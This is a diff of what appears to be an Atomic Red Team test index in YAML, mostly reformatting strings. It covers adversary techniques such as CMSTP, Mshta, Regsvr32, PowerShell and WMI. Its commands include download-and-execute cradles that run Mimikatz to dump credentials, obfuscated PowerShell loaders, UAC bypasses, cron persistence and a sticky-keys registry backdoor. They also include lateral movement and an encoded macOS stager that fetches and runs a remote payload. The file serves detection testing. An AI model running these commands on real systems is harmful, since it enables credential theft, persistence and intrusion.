command: 'osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK''));\"
| python &""
'
T1191:
technique:
name: CMSTP
@@ -12321,8 +12793,10 @@ execution:
identifier: T1191
atomic_tests:
- name: CMSTP Executing Remote Scriptlet
description: |
Adversaries may supply CMSTP.exe with INF files infected with malicious commands
description: 'Adversaries may supply CMSTP.exe with INF files infected with
malicious commands
'
supported_platforms:
- windows
input_arguments:
@@ -12332,11 +12806,14 @@ execution:
default: T1191.inf
executor:
name: command_prompt
command: |
cmstp.exe /s #{inf_file_path}
command: 'cmstp.exe /s #{inf_file_path}
'
- name: CMSTP Executing UAC Bypass
description: |
Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
embedding them in the RunPreSetupCommandsSection of an INF file
'
supported_platforms:
- windows
input_arguments:
@@ -12346,8 +12823,9 @@ execution:
default: T1191_uacbypass.inf
executor:
name: command_prompt
command: |
cmstp.exe /s #{inf_file_uac} /au
command: 'cmstp.exe /s #{inf_file_uac} /au
'
T1059:
technique:
name: Command-Line Interface
@@ -12536,8 +13014,9 @@ execution:
identifier: T1173
atomic_tests:
- name: Execute Commands
description: |
Executes commands via DDE using Microsfot Word
description: 'Executes commands via DDE using Microsfot Word
'
supported_platforms:
- windows
executor:
@@ -12615,8 +13094,9 @@ execution:
identifier: T1118
atomic_tests:
- name: InstallUtil uninstall method call
description: |
Executes the Uninstall Method
description: 'Executes the Uninstall Method
'
supported_platforms:
- windows
input_arguments:
@@ -12690,14 +13170,16 @@ execution:
identifier: T1152
atomic_tests:
- name: Launchctl
description: |
Utilize launchctl
description: 'Utilize launchctl
'
supported_platforms:
- macos
executor:
name: sh
command: |
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
'
T1168:
technique:
name: Local Job Scheduling
@@ -12785,8 +13267,9 @@ execution:
identifier: T1168
atomic_tests:
- name: Cron Job
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
- centos
@@ -12799,11 +13282,13 @@ execution:
default: "/tmp/evil.sh"
executor:
name: sh
command: |
echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
command: 'echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
'
- name: Cron Job
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
- centos
@@ -12942,8 +13427,9 @@ execution:
identifier: T1170
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: |
Test execution of a remote script using mshta.exe
description: 'Test execution of a remote script using mshta.exe
'
supported_platforms:
- windows
input_arguments:
@@ -12953,8 +13439,9 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct
executor:
name: command_prompt
command: |
mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
'
T1086:
technique:
name: PowerShell
@@ -13035,8 +13522,9 @@ execution:
identifier: T1086
atomic_tests:
- name: Mimikatz
description: |
Download Mimikatz and dump credentials
description: 'Download Mimikatz and dump credentials
'
supported_platforms:
- windows
input_arguments:
@@ -13046,11 +13534,14 @@ execution:
default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
executor:
name: command_prompt
command: |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}'');
Invoke-Mimikatz -DumpCreds"
'
- name: BloodHound
description: |
Download Bloodhound and run it
description: 'Download Bloodhound and run it
'
supported_platforms:
- windows
input_arguments:
@@ -13060,8 +13551,10 @@ execution:
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1
executor:
name: command_prompt
command: |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Get-BloodHoundData"
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
Get-BloodHoundData"
'
- name: Obfuscation Tests
description: |
Different obfuscated methods to test
@@ -13080,14 +13573,26 @@ execution:
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
- name: Mimikatz - Cradlecraft PsSendKeys
description: |
Run mimikatz via PsSendKeys
description: 'Run mimikatz via PsSendKeys
'
supported_platforms:
- windows
executor:
name: powershell
command: |
$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
command: "$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object
-ComObject WScript.Shell;$reg='HKCU:\\Software\\Microsoft\\Notepad';$app='Notepad';$props=(Get-ItemProperty
$reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP
$reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item
Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep
-Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds
500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable
_).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item
Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable
_).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item
Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP
$reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz
-dumpcr\n"
- name: Invoke-AppPathBypass
description: |
Note: Windows 10 only
@@ -13101,8 +13606,9 @@ execution:
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass"
C:\Windows\System32\cmd.exe
- name: PowerShell Add User
description: |
Using PS 5.1, add a user via CLI
description: 'Using PS 5.1, add a user via CLI
'
supported_platforms:
- windows
input_arguments:
@@ -13124,8 +13630,10 @@ execution:
default: Atomic Things
executor:
name: command_prompt
command: |
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
command: 'New-LocalUser -FullName ''#{full_name}'' -Name ''#{user_name}''
-Password #{password} -Description ''#{description}''
'
- name: Powershell MsXml COM object
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -13140,8 +13648,11 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
executor:
name: command_prompt
command: |
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
command: 'powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object
-ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
$comMsXml.ResponseText"
'
- name: Powershell XML requests
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -13155,8 +13666,11 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml
executor:
name: command_prompt
command: |
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
command: '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec
bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute
| IEX"
'
- name: Powershell invoke mshta.exe download
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -13170,8 +13684,9 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct
executor:
name: powershell
command: |
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:#{url}").Exec();close()"
command: '"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:#{url}").Exec();close()"
'
- name: Powershell Invoke-DownloadCradle
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -13184,8 +13699,10 @@ execution:
1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
- name: PowerShell Fileless Script Execution
description: |
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
description: 'Execution of a PowerShell payload from the Windows Registry similar
to that seen in fileless malware infections.
'
supported_platforms:
- windows
executor:
@@ -13258,8 +13775,9 @@ execution:
identifier: T1121
atomic_tests:
- name: Regasm Uninstall Method Call Test
description: |
Executes the Uninstall Method, No Admin Rights Required
description: 'Executes the Uninstall Method, No Admin Rights Required
'
supported_platforms:
- windows
input_arguments:
@@ -13278,8 +13796,10 @@ execution:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
del #{file_name}
- name: Regsvs Uninstall Method Call Test
description: |
Executes the Uninstall Method, No Admin Rights Required, Requires SNK
description: 'Executes the Uninstall Method, No Admin Rights Required, Requires
SNK
'
supported_platforms:
- windows
input_arguments:
@@ -13379,8 +13899,10 @@ execution:
identifier: T1117
atomic_tests:
- name: Regsvr32 local COM scriptlet execution
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
supported_platforms:
- windows
input_arguments:
@@ -13390,11 +13912,14 @@ execution:
default: C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct
executor:
name: command_prompt
command: |
regsvr32.exe /s /u /i:#{filename} scrobj.dll
command: 'regsvr32.exe /s /u /i:#{filename} scrobj.dll
'
- name: Regsvr32 remote COM scriptlet execution
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
supported_platforms:
- windows
input_arguments:
@@ -13404,11 +13929,14 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct
executor:
name: command_prompt
command: |
regsvr32.exe /s /u /i:#{url} scrobj.dll
command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll
'
- name: Regsvr32 local DLL execution
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
supported_platforms:
- windows
input_arguments:
@@ -13418,8 +13946,10 @@ execution:
default: C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
executor:
name: command_prompt
command: |
"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
command: '"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
/s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
'
T1085:
technique:
name: Rundll32
@@ -13486,8 +14016,9 @@ execution:
identifier: T1085
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: |
Test execution of a remote script using rundll32.exe
description: 'Test execution of a remote script using rundll32.exe
'
supported_platforms:
- windows
input_arguments:
@@ -13497,8 +14028,9 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
executor:
name: command_prompt
command: |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
'
T1053:
technique:
name: Scheduled Task
@@ -13598,8 +14130,9 @@ execution:
- windows
executor:
name: command_prompt
command: |
at 13:20 /interactive cmd
command: 'at 13:20 /interactive cmd
'
- name: Scheduled task Local
description: ''
supported_platforms:
@@ -13615,11 +14148,13 @@ execution:
default: 72600
executor:
name: command_prompt
command: |
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
- name: Scheduled task Remote
description: |
Create a task on a remote system
description: 'Create a task on a remote system
'
supported_platforms:
- windows
input_arguments:
@@ -13645,8 +14180,10 @@ execution:
default: At0micStrong
executor:
name: command_prompt
command: |
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
T1064:
technique:
name: Scripting
@@ -13720,8 +14257,9 @@ execution:
identifier: T1064
atomic_tests:
- name: Create and Execute Bash Shell Script
description: |
Creates and executes a simple bash script.
description: 'Creates and executes a simple bash script.
'
supported_platforms:
- macos
- linux
@@ -13858,8 +14396,10 @@ execution:
identifier: T1216
atomic_tests:
- name: PubPrn.vbs Signed Script Bypass
description: |
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
description: 'Executes the signed PubPrn.vbs script with options to download
and execute an arbitrary payload.
'
supported_platforms:
- windows
input_arguments:
@@ -13869,8 +14409,10 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
executor:
name: command_prompt
command: |
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
localhost "script:#{remote_payload}"
'
T1153:
technique:
name: Source
@@ -13916,8 +14458,9 @@ execution:
identifier: T1153
atomic_tests:
- name: Execute Script using Source
description: |
Creates a script and executes it using the source command
description: 'Creates a script and executes it using the source command
'
supported_platforms:
- macos
- linux
@@ -13928,8 +14471,10 @@ execution:
chmod +x /tmp/art.sh
source /tmp/art.sh
- name: Execute Script using Source Alias
description: |
Creates a script and executes it using the source command's dot alias
description: 'Creates a script and executes it using the source command''s dot
alias
'
supported_platforms:
- macos
- linux
@@ -13995,8 +14540,9 @@ execution:
identifier: T1151
atomic_tests:
- name: Space After Filename
description: |
Space After Filename
description: 'Space After Filename
'
supported_platforms:
- macos
executor:
@@ -14208,8 +14754,9 @@ execution:
identifier: T1127
atomic_tests:
- name: MSBuild Bypass Using Inline Tasks
description: |
Executes the code in a project file using. C# Example
description: 'Executes the code in a project file using. C# Example
'
supported_platforms:
- windows
input_arguments:
@@ -14219,11 +14766,15 @@ execution:
default: T1127.csproj
executor:
name: command_prompt
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
'
- name: MSXSL Bypass using local files
description: |
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
description: 'Executes the code specified within a XSL script tag during XSL
transformation using a local payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
supported_platforms:
- windows
input_arguments:
@@ -14237,11 +14788,15 @@ execution:
default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
- name: MSXSL Bypass using remote files
description: |
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
description: 'Executes the code specified within a XSL script tag during XSL
transformation using a remote payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
supported_platforms:
- windows
input_arguments:
@@ -14255,8 +14810,9 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
T1047:
technique:
name: Windows Management Instrumentation
@@ -14327,35 +14883,42 @@ execution:
identifier: T1047
atomic_tests:
- name: WMI Reconnaissance Users
description: |
WMI List User Accounts
description: 'WMI List User Accounts
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
wmic useraccount get /ALL
command: 'wmic useraccount get /ALL
'
- name: WMI Reconnaissance Processes
description: |
WMI List Processes
description: 'WMI List Processes
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
wmic process get caption,executablepath,commandline
command: 'wmic process get caption,executablepath,commandline
'
- name: WMI Reconnaissance Software
description: |
WMI List Software
description: 'WMI List Software
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
wmic qfe get description,installedOn /format:csv
command: 'wmic qfe get description,installedOn /format:csv
'
- name: WMI Reconnaissance List Remote Services
description: |
WMI List Remote Services
description: 'WMI List Remote Services
'
supported_platforms:
- windows
input_arguments:
@@ -14369,8 +14932,10 @@ execution:
default: sql server
executor:
name: command_prompt
command: |
wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%")
command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}
(%")
'
T1028:
technique:
name: Windows Remote Management
@@ -14429,14 +14994,16 @@ execution:
identifier: T1028
atomic_tests:
- name: Enable Windows Remote Management
description: |
Powershell Enable WinRM
description: 'Powershell Enable WinRM
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Enable-PSRemoting -Force
command: 'Enable-PSRemoting -Force
'
- name: PowerShell Lateral Movement
description: |
Powershell lateral movement using the mmc20 application com object
@@ -14453,11 +15020,14 @@ execution:
default: computer1
executor:
name: command_prompt
command: |
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
command: 'powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
$null, $null, "7")
'
- name: WMIC Process Call Create
description: |
Utilize WMIC to start remote process
description: 'Utilize WMIC to start remote process
'
supported_platforms:
- windows
input_arguments:
@@ -14475,11 +15045,16 @@ execution:
default: Target
executor:
name: command_prompt
command: |
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
command: 'wmic /user:#{user_name} /password:#{password} /node:#{computer_name}
process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\"
/t REG_SZ /d \"cmd.exe\" /f"
'
- name: Psexec
description: |
Utilize psexec to start remote process
description: 'Utilize psexec to start remote process
'
supported_platforms:
- windows
input_arguments:
@@ -14497,11 +15072,13 @@ execution:
default: Target
executor:
name: command_prompt
command: |
psexec \\host -u domain\user -p password -s cmd.exe
command: 'psexec \\host -u domain\user -p password -s cmd.exe
'
- name: Invoke-Command
description: |
Execute Invoke-command on remote host
description: 'Execute Invoke-command on remote host
'
supported_platforms:
- windows
input_arguments:
@@ -14515,8 +15092,9 @@ execution:
default: ipconfig
executor:
name: powershell
command: |
invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
command: 'invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
'
lateral-movement:
T1155:
technique:
@@ -14584,8 +15162,10 @@ lateral-movement:
- macos
executor:
name: sh
command: |
osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\" | python &""
